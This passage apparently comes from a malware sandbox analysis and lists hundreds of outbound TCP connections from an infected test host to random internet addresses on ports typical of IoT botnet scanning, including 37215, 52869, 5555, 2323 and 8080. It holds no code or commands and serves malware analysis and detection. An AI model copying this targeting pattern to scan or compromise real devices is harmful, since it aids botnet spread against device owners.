                Source: global trafficTCP traffic: 192.168.2.20:39240 -> 103.85.14.140:8080
                Source: global trafficTCP traffic: 192.168.2.20:56124 -> 40.138.247.89:37215
                Source: global trafficTCP traffic: 192.168.2.20:51670 -> 8.12.234.110:7574
                Source: global trafficTCP traffic: 192.168.2.20:48120 -> 90.83.4.176:8080
                Source: global trafficTCP traffic: 192.168.2.20:42730 -> 165.66.227.31:49152
                Source: global trafficTCP traffic: 192.168.2.20:40102 -> 25.51.164.16:81
                Source: global trafficTCP traffic: 192.168.2.20:48710 -> 215.223.3.104:8443
                Source: global trafficTCP traffic: 192.168.2.20:52772 -> 140.112.93.27:5555
                Source: global trafficTCP traffic: 192.168.2.20:45486 -> 23.6.254.240:49152
                Source: global trafficTCP traffic: 192.168.2.20:37650 -> 94.18.108.108:37215
                Source: global trafficTCP traffic: 192.168.2.20:53028 -> 27.17.171.210:37215
                Source: global trafficTCP traffic: 192.168.2.20:55848 -> 83.12.51.114:7574
                Source: global trafficTCP traffic: 192.168.2.20:54254 -> 75.82.66.140:49152
                Source: global trafficTCP traffic: 192.168.2.20:40446 -> 64.114.216.199:8443
                Source: global trafficTCP traffic: 192.168.2.20:35228 -> 97.155.241.217:81
                Source: global trafficTCP traffic: 192.168.2.20:41312 -> 207.155.33.174:81
                Source: global trafficTCP traffic: 192.168.2.20:51226 -> 57.185.135.155:7574
                Source: global trafficTCP traffic: 192.168.2.20:51886 -> 83.239.71.57:8080
                Source: global trafficTCP traffic: 192.168.2.20:56614 -> 212.172.120.97:81
                Source: global trafficTCP traffic: 192.168.2.20:39904 -> 132.221.174.139:8080
                Source: global trafficTCP traffic: 192.168.2.20:48760 -> 189.165.80.3:49152
                Source: global trafficTCP traffic: 192.168.2.20:46982 -> 62.236.179.84:49152
                Source: global trafficTCP traffic: 192.168.2.20:39964 -> 19.32.33.10:8080
                Source: global trafficTCP traffic: 192.168.2.20:38028 -> 2.96.223.8:52869
                Source: global trafficTCP traffic: 192.168.2.20:48660 -> 109.31.128.69:52869
                Source: global trafficTCP traffic: 192.168.2.20:44258 -> 60.210.62.143:8080
                Source: global trafficTCP traffic: 192.168.2.20:51608 -> 189.24.15.173:8080
                Source: global trafficTCP traffic: 192.168.2.20:36080 -> 143.157.186.149:49152
                Source: global trafficTCP traffic: 192.168.2.20:37974 -> 33.131.76.243:8080
                Source: global trafficTCP traffic: 192.168.2.20:32806 -> 213.66.171.50:5555
                Source: global trafficTCP traffic: 192.168.2.20:45062 -> 174.75.143.253:8080
                Source: global trafficTCP traffic: 192.168.2.20:38136 -> 125.47.115.66:8080
                Source: global trafficTCP traffic: 192.168.2.20:37988 -> 116.96.140.222:81
                Source: global trafficTCP traffic: 192.168.2.20:51768 -> 205.65.176.52:8080
                Source: global trafficTCP traffic: 192.168.2.20:46330 -> 70.101.220.144:81
                Source: global trafficTCP traffic: 192.168.2.20:41050 -> 124.58.248.76:8080
                Source: global trafficTCP traffic: 192.168.2.20:59892 -> 93.89.24.103:8080
                Source: global trafficTCP traffic: 192.168.2.20:50658 -> 97.102.82.184:8443
                Source: global trafficTCP traffic: 192.168.2.20:57754 -> 47.24.59.44:8080
                Source: global trafficTCP traffic: 192.168.2.20:45324 -> 96.125.82.59:81
                Source: global trafficTCP traffic: 192.168.2.20:57666 -> 218.152.25.33:52869
                Source: global trafficTCP traffic: 192.168.2.20:39684 -> 57.102.106.47:8443
                Source: global trafficTCP traffic: 192.168.2.20:37290 -> 113.19.51.15:5555
                Source: global trafficTCP traffic: 192.168.2.20:50808 -> 40.92.162.99:7574
                Source: global trafficTCP traffic: 192.168.2.20:57416 -> 86.43.207.148:5555
                Source: global trafficTCP traffic: 192.168.2.20:56054 -> 106.161.219.27:81
                Source: global trafficTCP traffic: 192.168.2.20:55884 -> 163.184.153.227:8080
                Source: global trafficTCP traffic: 192.168.2.20:57918 -> 141.126.33.205:7574
                Source: global trafficTCP traffic: 192.168.2.20:52472 -> 116.221.170.83:49152
                Source: global trafficTCP traffic: 192.168.2.20:48092 -> 63.90.182.218:5555
                Source: global trafficTCP traffic: 192.168.2.20:47774 -> 7.21.198.0:8080
                Source: global trafficTCP traffic: 192.168.2.20:49264 -> 217.176.48.194:5555
                Source: global trafficTCP traffic: 192.168.2.20:41198 -> 167.62.66.41:7574
                Source: global trafficTCP traffic: 192.168.2.20:34862 -> 100.16.3.210:37215
                Source: global trafficTCP traffic: 192.168.2.20:57904 -> 76.8.208.127:8080
                Source: global trafficTCP traffic: 192.168.2.20:48356 -> 83.49.243.21:5555
                Source: global trafficTCP traffic: 192.168.2.20:41776 -> 134.251.70.154:81
                Source: global trafficTCP traffic: 192.168.2.20:38232 -> 211.77.98.194:8080
                Source: global trafficTCP traffic: 192.168.2.20:33816 -> 33.231.205.9:81
                Source: global trafficTCP traffic: 192.168.2.20:47970 -> 176.222.112.208:8443
                Source: global trafficTCP traffic: 192.168.2.20:34336 -> 170.166.81.83:8080
                Source: global trafficTCP traffic: 192.168.2.20:59896 -> 8.33.217.230:7574
                Source: global trafficTCP traffic: 192.168.2.20:39252 -> 48.177.79.80:8080
                Source: global trafficTCP traffic: 192.168.2.20:47010 -> 69.98.117.154:8080
                Source: global trafficTCP traffic: 192.168.2.20:51306 -> 107.82.103.68:81
                Source: global trafficTCP traffic: 192.168.2.20:60620 -> 114.207.0.228:49152
                Source: global trafficTCP traffic: 192.168.2.20:38214 -> 175.46.210.102:37215
                Source: global trafficTCP traffic: 192.168.2.20:46786 -> 195.19.159.232:81
                Source: global trafficTCP traffic: 192.168.2.20:59352 -> 16.197.247.12:49152
                Source: global trafficTCP traffic: 192.168.2.20:40358 -> 150.208.253.148:8080
                Source: global trafficTCP traffic: 192.168.2.20:42084 -> 200.109.140.124:52869
                Source: global trafficTCP traffic: 192.168.2.20:56678 -> 112.15.3.127:5555
                Source: global trafficTCP traffic: 192.168.2.20:56346 -> 135.200.130.160:8080
                Source: global trafficTCP traffic: 192.168.2.20:34610 -> 38.139.125.205:49152
                Source: global trafficTCP traffic: 192.168.2.20:38116 -> 115.221.72.54:49152
                Source: global trafficTCP traffic: 192.168.2.20:45314 -> 28.74.33.60:5555
                Source: global trafficTCP traffic: 192.168.2.20:51142 -> 114.83.134.162:37215
                Source: global trafficTCP traffic: 192.168.2.20:50068 -> 84.251.11.225:8080
                Source: global trafficTCP traffic: 192.168.2.20:58762 -> 61.139.160.110:8443
                Source: global trafficTCP traffic: 192.168.2.20:42906 -> 36.231.186.108:7574
                Source: global trafficTCP traffic: 192.168.2.20:33294 -> 209.91.20.132:52869
                Source: global trafficTCP traffic: 192.168.2.20:54846 -> 32.56.244.120:49152
                Source: global trafficTCP traffic: 192.168.2.20:59996 -> 91.31.219.112:81
                Source: global trafficTCP traffic: 192.168.2.20:33264 -> 22.115.11.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:41658 -> 45.15.0.42:49152
                Source: global trafficTCP traffic: 192.168.2.20:35174 -> 66.225.40.228:7574
                Source: global trafficTCP traffic: 192.168.2.20:53400 -> 112.62.185.86:8080
                Source: global trafficTCP traffic: 192.168.2.20:47594 -> 158.6.58.6:8080
                Source: global trafficTCP traffic: 192.168.2.20:45558 -> 220.179.82.16:37215
                Source: global trafficTCP traffic: 192.168.2.20:42420 -> 101.205.175.231:81
                Source: global trafficTCP traffic: 192.168.2.20:34098 -> 44.66.17.187:37215
                Source: global trafficTCP traffic: 192.168.2.20:48334 -> 114.100.97.125:7574
                Source: global trafficTCP traffic: 192.168.2.20:56648 -> 56.103.247.65:81
                Source: global trafficTCP traffic: 192.168.2.20:49674 -> 59.150.94.42:8080
                Source: global trafficTCP traffic: 192.168.2.20:52518 -> 101.1.70.165:8080
                Source: global trafficTCP traffic: 192.168.2.20:47140 -> 203.63.207.193:52869
                Source: global trafficTCP traffic: 192.168.2.20:56190 -> 217.208.124.202:8080
                Source: global trafficTCP traffic: 192.168.2.20:60212 -> 4.119.113.119:52869
                Source: global trafficTCP traffic: 192.168.2.20:60478 -> 135.233.240.19:8443
                Source: global trafficTCP traffic: 192.168.2.20:48908 -> 211.64.237.240:52869
                Source: global trafficTCP traffic: 192.168.2.20:40858 -> 177.69.69.101:8080
                Source: global trafficTCP traffic: 192.168.2.20:39242 -> 163.101.185.176:5555
                Source: global trafficTCP traffic: 192.168.2.20:46542 -> 201.92.147.46:8080
                Source: global trafficTCP traffic: 192.168.2.20:32940 -> 159.234.185.133:81
                Source: global trafficTCP traffic: 192.168.2.20:35358 -> 202.214.128.209:49152
                Source: global trafficTCP traffic: 192.168.2.20:50750 -> 109.222.251.31:8080
                Source: global trafficTCP traffic: 192.168.2.20:53646 -> 173.41.202.36:5555
                Source: global trafficTCP traffic: 192.168.2.20:53022 -> 90.27.43.235:8080
                Source: global trafficTCP traffic: 192.168.2.20:50932 -> 80.48.253.30:8080
                Source: global trafficTCP traffic: 192.168.2.20:40526 -> 155.4.179.213:37215
                Source: global trafficTCP traffic: 192.168.2.20:44066 -> 179.37.139.184:49152
                Source: global trafficTCP traffic: 192.168.2.20:58510 -> 97.158.222.212:7574
                Source: global trafficTCP traffic: 192.168.2.20:34640 -> 87.226.205.134:37215
                Source: global trafficTCP traffic: 192.168.2.20:52590 -> 39.143.29.32:8443
                Source: global trafficTCP traffic: 192.168.2.20:54138 -> 213.150.115.196:52869
                Source: global trafficTCP traffic: 192.168.2.20:35864 -> 203.41.82.213:5555
                Source: global trafficTCP traffic: 192.168.2.20:55284 -> 190.76.26.149:7574
                Source: global trafficTCP traffic: 192.168.2.20:39364 -> 77.121.111.66:5555
                Source: global trafficTCP traffic: 192.168.2.20:58206 -> 188.187.254.99:7574
                Source: global trafficTCP traffic: 192.168.2.20:34792 -> 30.103.130.82:8080
                Source: global trafficTCP traffic: 192.168.2.20:39718 -> 99.183.96.40:49152
                Source: global trafficTCP traffic: 192.168.2.20:44044 -> 128.42.237.138:49152
                Source: global trafficTCP traffic: 192.168.2.20:43638 -> 84.10.4.162:8443
                Source: global trafficTCP traffic: 192.168.2.20:60674 -> 159.204.174.240:8080
                Source: global trafficTCP traffic: 192.168.2.20:51916 -> 39.33.177.25:8080
                Source: global trafficTCP traffic: 192.168.2.20:42610 -> 125.246.85.252:52869
                Source: global trafficTCP traffic: 192.168.2.20:42772 -> 80.155.51.0:8080
                Source: global trafficTCP traffic: 192.168.2.20:51712 -> 182.53.78.71:8080
                Source: global trafficTCP traffic: 192.168.2.20:39944 -> 57.22.136.117:5555
                Source: global trafficTCP traffic: 192.168.2.20:47454 -> 110.143.134.237:8443
                Source: global trafficTCP traffic: 192.168.2.20:37526 -> 66.168.225.187:8080
                Source: global trafficTCP traffic: 192.168.2.20:49332 -> 80.60.103.8:8080
                Source: global trafficTCP traffic: 192.168.2.20:42322 -> 54.133.252.147:8080
                Source: global trafficTCP traffic: 192.168.2.20:56298 -> 90.106.68.161:5555
                Source: global trafficTCP traffic: 192.168.2.20:60010 -> 82.6.17.28:49152
                Source: global trafficTCP traffic: 192.168.2.20:45454 -> 5.253.248.89:5555
                Source: global trafficTCP traffic: 192.168.2.20:58228 -> 216.151.191.61:49152
                Source: global trafficTCP traffic: 192.168.2.20:55260 -> 59.27.22.152:5555
                Source: global trafficTCP traffic: 192.168.2.20:59266 -> 13.48.97.208:8080
                Source: global trafficTCP traffic: 192.168.2.20:45154 -> 71.163.189.157:52869
                Source: global trafficTCP traffic: 192.168.2.20:40666 -> 210.156.134.129:5555
                Source: global trafficTCP traffic: 192.168.2.20:52054 -> 178.232.31.216:49152
                Source: global trafficTCP traffic: 192.168.2.20:58536 -> 26.66.8.104:8443
                Source: global trafficTCP traffic: 192.168.2.20:45552 -> 29.161.161.202:37215
                Source: global trafficTCP traffic: 192.168.2.20:56202 -> 14.9.89.162:37215
                Source: global trafficTCP traffic: 192.168.2.20:35034 -> 47.116.0.88:8080
                Source: global trafficTCP traffic: 192.168.2.20:33424 -> 153.192.200.52:8080
                Source: global trafficTCP traffic: 192.168.2.20:43688 -> 119.221.185.143:81
                Source: global trafficTCP traffic: 192.168.2.20:48322 -> 149.2.39.187:81
                Source: global trafficTCP traffic: 192.168.2.20:36866 -> 199.83.85.2:8443
                Source: global trafficTCP traffic: 192.168.2.20:45738 -> 8.195.49.95:8080
                Source: global trafficTCP traffic: 192.168.2.20:54054 -> 20.118.177.230:8080
                Source: global trafficTCP traffic: 192.168.2.20:51596 -> 211.90.22.130:52869
                Source: global trafficTCP traffic: 192.168.2.20:40030 -> 185.96.115.202:81
                Source: global trafficTCP traffic: 192.168.2.20:44914 -> 166.222.6.236:8443
                Source: global trafficTCP traffic: 192.168.2.20:54594 -> 210.154.170.145:8443
                Source: global trafficTCP traffic: 192.168.2.20:56846 -> 72.209.65.6:5555
                Source: global trafficTCP traffic: 192.168.2.20:35696 -> 107.206.64.63:49152
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 145.182.69.182:1023
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 221.181.153.172:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 177.188.60.106:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 2.54.64.238:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 97.10.202.197:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 58.230.150.58:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 150.63.40.57:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 90.207.158.126:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 117.133.86.215:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 76.55.5.193:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 188.62.48.155:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 80.252.193.51:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 65.51.41.97:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 196.58.211.126:1023
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 57.185.15.163:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 83.33.47.234:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 42.14.150.189:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 65.47.92.118:1023
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 101.250.208.133:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 76.185.246.95:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 41.76.28.201:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 150.194.5.177:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 190.35.110.173:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 150.27.113.8:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 20.155.76.246:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 149.131.65.238:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 154.17.234.146:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 162.227.63.156:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 147.133.65.211:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 14.227.22.208:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 1.254.121.146:1023
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 143.6.32.210:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 176.231.61.194:2323
                Source: global trafficTCP traffic: 192.168.2.20:38939 -> 160.197.208.150:2323
                Source: global trafficTCP traffic: 192.168.2.20:58728 -> 181.184.100.201:5555
                Source: global trafficTCP traffic: 192.168.2.20:48060 -> 84.48.141.104:52869
                Source: global trafficTCP traffic: 192.168.2.20:46438 -> 150.37.72.24:52869
                Source: global trafficTCP traffic: 192.168.2.20:51796 -> 213.6.140.69:8080
                Source: global trafficTCP traffic: 192.168.2.20:37058 -> 20.39.219.107:81
                Source: global trafficTCP traffic: 192.168.2.20:60698 -> 36.215.1.47:8080
                Source: global trafficTCP traffic: 192.168.2.20:56426 -> 87.196.124.127:8080
                Source: global trafficTCP traffic: 192.168.2.20:56038 -> 203.33.70.125:8080
                Source: global trafficTCP traffic: 192.168.2.20:52674 -> 42.126.106.105:8080
                Source: global trafficTCP traffic: 192.168.2.20:52092 -> 26.80.202.172:52869
                Source: global trafficTCP traffic: 192.168.2.20:46258 -> 115.175.200.251:8080
                Source: global trafficTCP traffic: 192.168.2.20:38614 -> 169.108.144.27:5555
                Source: global trafficTCP traffic: 192.168.2.20:51460 -> 143.72.213.200:81
                Source: global trafficTCP traffic: 192.168.2.20:41802 -> 179.230.179.216:7574
                Source: global trafficTCP traffic: 192.168.2.20:43194 -> 73.105.97.89:81
                Source: global trafficTCP traffic: 192.168.2.20:55094 -> 122.144.5.143:8080
                Source: global trafficTCP traffic: 192.168.2.20:57972 -> 193.118.213.59:49152
                Source: global trafficTCP traffic: 192.168.2.20:56050 -> 44.15.17.151:8080
                Source: global trafficTCP traffic: 192.168.2.20:54570 -> 3.24.235.217:8080
                Source: global trafficTCP traffic: 192.168.2.20:40390 -> 24.139.116.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:59268 -> 6.42.34.236:8080
                Source: global trafficTCP traffic: 192.168.2.20:35682 -> 107.100.37.172:8080
                Source: global trafficTCP traffic: 192.168.2.20:43186 -> 4.97.70.5:8443
                Source: global trafficTCP traffic: 192.168.2.20:38248 -> 112.31.181.246:8080
                Source: global trafficTCP traffic: 192.168.2.20:35444 -> 106.35.192.42:8443
                Source: global trafficTCP traffic: 192.168.2.20:47648 -> 45.102.94.126:7574
                Source: global trafficTCP traffic: 192.168.2.20:37882 -> 24.145.27.42:81
                Source: global trafficTCP traffic: 192.168.2.20:42216 -> 165.16.122.1:37215
                Source: global trafficTCP traffic: 192.168.2.20:39682 -> 27.20.114.90:37215
                Source: global trafficTCP traffic: 192.168.2.20:58278 -> 89.220.51.12:8080
                Source: global trafficTCP traffic: 192.168.2.20:51446 -> 11.163.212.152:5555
                Source: global trafficTCP traffic: 192.168.2.20:49398 -> 135.14.236.107:8080
                Source: global trafficTCP traffic: 192.168.2.20:34456 -> 119.138.58.232:7574
                Source: global trafficTCP traffic: 192.168.2.20:57300 -> 16.189.20.123:8443
                Source: global trafficTCP traffic: 192.168.2.20:54416 -> 60.147.4.225:8080
                Source: global trafficTCP traffic: 192.168.2.20:50322 -> 63.156.222.43:8080
                Source: global trafficTCP traffic: 192.168.2.20:39482 -> 6.86.153.110:52869
                Source: global trafficTCP traffic: 192.168.2.20:59164 -> 2.232.155.121:8080
                Source: global trafficTCP traffic: 192.168.2.20:60582 -> 215.96.13.140:8080
                Source: global trafficTCP traffic: 192.168.2.20:58826 -> 115.68.81.229:5555
                Source: global trafficTCP traffic: 192.168.2.20:55466 -> 63.119.139.18:52869
                Source: global trafficTCP traffic: 192.168.2.20:37268 -> 128.74.254.8:81
                Source: global trafficTCP traffic: 192.168.2.20:39216 -> 18.85.1.6:8080
                Source: global trafficTCP traffic: 192.168.2.20:39354 -> 50.117.194.170:81
                Source: global trafficTCP traffic: 192.168.2.20:50174 -> 194.203.125.103:37215
                Source: global trafficTCP traffic: 192.168.2.20:49104 -> 13.76.121.137:7574
                Source: global trafficTCP traffic: 192.168.2.20:52786 -> 209.110.181.128:5555
                Source: global trafficTCP traffic: 192.168.2.20:40564 -> 191.199.26.110:52869
                Source: global trafficTCP traffic: 192.168.2.20:49016 -> 161.225.141.251:52869
                Source: global trafficTCP traffic: 192.168.2.20:43880 -> 90.245.97.44:5555
                Source: global trafficTCP traffic: 192.168.2.20:57830 -> 113.102.129.74:8080
                Source: global trafficTCP traffic: 192.168.2.20:49722 -> 220.5.66.90:7574
                Source: global trafficTCP traffic: 192.168.2.20:42298 -> 46.218.39.117:8080
                Source: global trafficTCP traffic: 192.168.2.20:57694 -> 121.2.76.155:8080
                Source: global trafficTCP traffic: 192.168.2.20:60814 -> 116.172.79.18:37215
                Source: global trafficTCP traffic: 192.168.2.20:50774 -> 118.206.103.100:52869
                Source: global trafficTCP traffic: 192.168.2.20:33334 -> 194.83.51.26:8080
                Source: global trafficTCP traffic: 192.168.2.20:38302 -> 203.160.221.66:52869
                Source: global trafficTCP traffic: 192.168.2.20:57940 -> 1.121.96.1:81
                Source: global trafficTCP traffic: 192.168.2.20:48880 -> 113.220.235.137:5555
                Source: global trafficTCP traffic: 192.168.2.20:41484 -> 123.247.45.252:8080
                Source: global trafficTCP traffic: 192.168.2.20:47310 -> 151.169.69.96:52869
                Source: global trafficTCP traffic: 192.168.2.20:32952 -> 186.183.85.110:8080
                Source: global trafficTCP traffic: 192.168.2.20:48128 -> 4.105.129.133:8080
                Source: global trafficTCP traffic: 192.168.2.20:60652 -> 101.108.160.68:7574
                Source: global trafficTCP traffic: 192.168.2.20:56192 -> 49.41.213.146:37215
                Source: global trafficTCP traffic: 192.168.2.20:44982 -> 30.2.20.173:5555
                Source: global trafficTCP traffic: 192.168.2.20:54582 -> 103.148.212.55:37215
                Source: global trafficTCP traffic: 192.168.2.20:55776 -> 82.218.21.170:5555
                Source: global trafficTCP traffic: 192.168.2.20:49832 -> 67.136.232.53:81
                Source: global trafficTCP traffic: 192.168.2.20:45456 -> 139.130.197.234:81
                Source: global trafficTCP traffic: 192.168.2.20:39778 -> 66.231.13.119:37215
                Source: global trafficTCP traffic: 192.168.2.20:34896 -> 114.154.250.15:37215
                Source: global trafficTCP traffic: 192.168.2.20:56176 -> 222.42.34.127:8080
                Source: global trafficTCP traffic: 192.168.2.20:45010 -> 64.6.129.201:8080
                Source: global trafficTCP traffic: 192.168.2.20:33090 -> 201.46.243.205:5555
                Source: global trafficTCP traffic: 192.168.2.20:54022 -> 121.10.6.126:37215
                Source: global trafficTCP traffic: 192.168.2.20:46364 -> 1.41.63.236:8443
                Source: global trafficTCP traffic: 192.168.2.20:44732 -> 52.241.184.173:8080
                Source: global trafficTCP traffic: 192.168.2.20:54896 -> 174.159.13.210:81
                Source: global trafficTCP traffic: 192.168.2.20:60782 -> 35.205.25.55:52869
                Source: global trafficTCP traffic: 192.168.2.20:42086 -> 31.127.22.163:49152
                Source: global trafficTCP traffic: 192.168.2.20:49844 -> 40.55.105.19:8443
                Source: global trafficTCP traffic: 192.168.2.20:56240 -> 139.49.163.59:52869
                Source: global trafficTCP traffic: 192.168.2.20:35598 -> 67.93.178.237:52869
                Source: global trafficTCP traffic: 192.168.2.20:36694 -> 134.89.250.10:8443
                Source: global trafficTCP traffic: 192.168.2.20:33240 -> 20.134.119.118:8443
                Source: global trafficTCP traffic: 192.168.2.20:54778 -> 20.124.162.183:8080
                Source: global trafficTCP traffic: 192.168.2.20:33658 -> 2.185.196.129:49152
                Source: global trafficTCP traffic: 192.168.2.20:38818 -> 65.18.254.63:8080
                Source: global trafficTCP traffic: 192.168.2.20:60582 -> 54.185.240.6:8443
                Source: global trafficTCP traffic: 192.168.2.20:55772 -> 75.69.136.4:5555
                Source: global trafficTCP traffic: 192.168.2.20:48024 -> 51.203.73.42:8443
                Source: global trafficTCP traffic: 192.168.2.20:54130 -> 197.124.118.3:37215
                Source: global trafficTCP traffic: 192.168.2.20:37378 -> 214.227.33.211:7574
                Source: global trafficTCP traffic: 192.168.2.20:53398 -> 119.92.5.81:81
                Source: global trafficTCP traffic: 192.168.2.20:34966 -> 76.65.52.254:8080
                Source: global trafficTCP traffic: 192.168.2.20:50700 -> 79.102.239.202:7574
                Source: global trafficTCP traffic: 192.168.2.20:56052 -> 164.204.0.203:8080
                Source: global trafficTCP traffic: 192.168.2.20:35204 -> 154.190.122.88:49152
                Source: global trafficTCP traffic: 192.168.2.20:45824 -> 57.164.19.75:49152
                Source: global trafficTCP traffic: 192.168.2.20:52868 -> 64.4.79.9:8080
                Source: global trafficTCP traffic: 192.168.2.20:49928 -> 36.184.218.26:37215
                Source: global trafficTCP traffic: 192.168.2.20:44348 -> 158.253.181.50:8080
                Source: global trafficTCP traffic: 192.168.2.20:58166 -> 195.46.141.157:7574
                Source: global trafficTCP traffic: 192.168.2.20:56270 -> 139.68.173.122:7574
                Source: global trafficTCP traffic: 192.168.2.20:37010 -> 120.161.181.26:37215
                Source: global trafficTCP traffic: 192.168.2.20:49240 -> 199.133.40.189:8080
                Source: global trafficTCP traffic: 192.168.2.20:35188 -> 174.149.62.131:7574
                Source: global trafficTCP traffic: 192.168.2.20:52546 -> 124.85.154.4:5555
                Source: global trafficTCP traffic: 192.168.2.20:49494 -> 126.6.39.232:5555
                Source: global trafficTCP traffic: 192.168.2.20:54438 -> 90.8.126.238:8080
                Source: global trafficTCP traffic: 192.168.2.20:39510 -> 145.28.157.72:5555
                Source: global trafficTCP traffic: 192.168.2.20:44804 -> 145.143.20.200:8080
                Source: global trafficTCP traffic: 192.168.2.20:58322 -> 114.238.112.196:52869
                Source: global trafficTCP traffic: 192.168.2.20:41206 -> 111.205.48.104:49152
                Source: global trafficTCP traffic: 192.168.2.20:56846 -> 33.128.39.87:37215
                Source: global trafficTCP traffic: 192.168.2.20:49548 -> 216.251.87.103:8080
                Source: global trafficTCP traffic: 192.168.2.20:59488 -> 73.2.23.66:49152
                Source: global trafficTCP traffic: 192.168.2.20:43724 -> 69.68.78.9:8080
                Source: global trafficTCP traffic: 192.168.2.20:58448 -> 11.149.77.64:5555
                Source: global trafficTCP traffic: 192.168.2.20:37030 -> 11.16.15.161:7574
                Source: global trafficTCP traffic: 192.168.2.20:41248 -> 68.179.189.189:52869
                Source: global trafficTCP traffic: 192.168.2.20:58532 -> 6.60.84.48:49152
                Source: global trafficTCP traffic: 192.168.2.20:36830 -> 221.116.192.198:8080
                Source: global trafficTCP traffic: 192.168.2.20:50814 -> 69.79.211.26:81
                Source: global trafficTCP traffic: 192.168.2.20:58462 -> 160.135.77.199:8080
                Source: global trafficTCP traffic: 192.168.2.20:52936 -> 164.95.36.160:8080
                Source: global trafficTCP traffic: 192.168.2.20:52276 -> 132.1.164.140:5555
                Source: global trafficTCP traffic: 192.168.2.20:40696 -> 75.154.151.151:8443
                Source: global trafficTCP traffic: 192.168.2.20:51414 -> 130.90.198.10:7574
                Source: global trafficTCP traffic: 192.168.2.20:54374 -> 138.68.113.164:8443
                Source: global trafficTCP traffic: 192.168.2.20:34274 -> 54.177.250.248:81
                Source: global trafficTCP traffic: 192.168.2.20:40648 -> 160.8.93.233:8443
                Source: global trafficTCP traffic: 192.168.2.20:59908 -> 178.123.18.214:37215
                Source: global trafficTCP traffic: 192.168.2.20:50452 -> 131.228.7.91:52869
                Source: global trafficTCP traffic: 192.168.2.20:55162 -> 181.221.30.207:7574
                Source: global trafficTCP traffic: 192.168.2.20:46854 -> 55.169.99.112:49152
                Source: global trafficTCP traffic: 192.168.2.20:54246 -> 37.117.214.1:8080
                Source: global trafficTCP traffic: 192.168.2.20:39974 -> 80.219.251.133:52869
                Source: global trafficTCP traffic: 192.168.2.20:33450 -> 69.12.226.143:81
                Source: global trafficTCP traffic: 192.168.2.20:33268 -> 76.213.165.145:49152
                Source: global trafficTCP traffic: 192.168.2.20:40022 -> 65.145.116.36:8080
                Source: global trafficTCP traffic: 192.168.2.20:52920 -> 60.5.129.42:8080
                Source: global trafficTCP traffic: 192.168.2.20:39982 -> 50.163.12.13:8443
                Source: global trafficTCP traffic: 192.168.2.20:55866 -> 146.41.13.62:5555
                Source: global trafficTCP traffic: 192.168.2.20:36400 -> 137.49.209.45:7574
                Source: global trafficTCP traffic: 192.168.2.20:47064 -> 70.132.111.66:37215
                Source: global trafficTCP traffic: 192.168.2.20:57098 -> 123.138.120.67:52869
                Source: global trafficTCP traffic: 192.168.2.20:36650 -> 55.239.199.186:8443
                Source: global trafficTCP traffic: 192.168.2.20:52960 -> 117.35.249.160:8080
                Source: global trafficTCP traffic: 192.168.2.20:56046 -> 131.78.144.55:7574
                Source: global trafficTCP traffic: 192.168.2.20:41090 -> 74.120.254.188:81
                Source: global trafficTCP traffic: 192.168.2.20:44662 -> 2.216.247.11:37215
                Source: global trafficTCP traffic: 192.168.2.20:57762 -> 38.214.49.224:5555
                Source: global trafficTCP traffic: 192.168.2.20:40068 -> 197.42.173.187:5555
                Source: global trafficTCP traffic: 192.168.2.20:54998 -> 184.102.137.171:8443
                Source: global trafficTCP traffic: 192.168.2.20:36676 -> 163.90.78.111:52869
                Source: global trafficTCP traffic: 192.168.2.20:53300 -> 120.239.0.46:37215
                Source: global trafficTCP traffic: 192.168.2.20:46448 -> 202.146.192.67:8443
                Source: global trafficTCP traffic: 192.168.2.20:44270 -> 136.17.183.97:8080
                Source: global trafficTCP traffic: 192.168.2.20:47752 -> 165.0.97.192:7574
                Source: global trafficTCP traffic: 192.168.2.20:35284 -> 178.58.212.116:8080
                Source: global trafficTCP traffic: 192.168.2.20:45608 -> 57.44.164.161:8080
                Source: global trafficTCP traffic: 192.168.2.20:43716 -> 108.148.40.172:81
                Source: global trafficTCP traffic: 192.168.2.20:59424 -> 221.222.213.136:37215
                Source: global trafficTCP traffic: 192.168.2.20:40884 -> 27.232.91.39:7574
                Source: global trafficTCP traffic: 192.168.2.20:50102 -> 222.145.19.211:7574
                Source: global trafficTCP traffic: 192.168.2.20:55268 -> 221.17.206.67:8080
                Source: global trafficTCP traffic: 192.168.2.20:41272 -> 47.230.160.237:8080
                Source: global trafficTCP traffic: 192.168.2.20:49292 -> 175.59.180.182:8080
                Source: global trafficTCP traffic: 192.168.2.20:51664 -> 31.145.88.88:5555
                Source: global trafficTCP traffic: 192.168.2.20:40566 -> 60.119.0.161:8080
                Source: global trafficTCP traffic: 192.168.2.20:55968 -> 218.182.128.219:49152
